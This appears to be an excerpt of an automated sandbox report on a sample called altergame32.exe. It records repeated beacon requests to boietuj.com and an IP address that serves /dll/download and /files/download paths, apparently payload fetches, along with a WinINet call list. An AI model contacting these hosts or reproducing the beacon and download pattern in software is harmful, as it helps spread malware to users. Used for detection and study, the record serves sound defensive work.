            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_02E472AB Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,InternetOpenA,InternetSetOptionA,InternetSetOptionA,InternetSetOptionA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_strtok,_swscanf,_strtok,_free,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,_sprintf,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_free,6_2_02E472AB
            Source: global trafficHTTP traffic detected: GET /add?substr=mixeleven&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dll/key HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dll/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31df92d8838ed12a666d307eca743ec4c2b07b529669238658ef814c4ef90 HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31df92d8838ed12a666d307eca743ec4c2b07b529669238658ef814c4ef90 HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
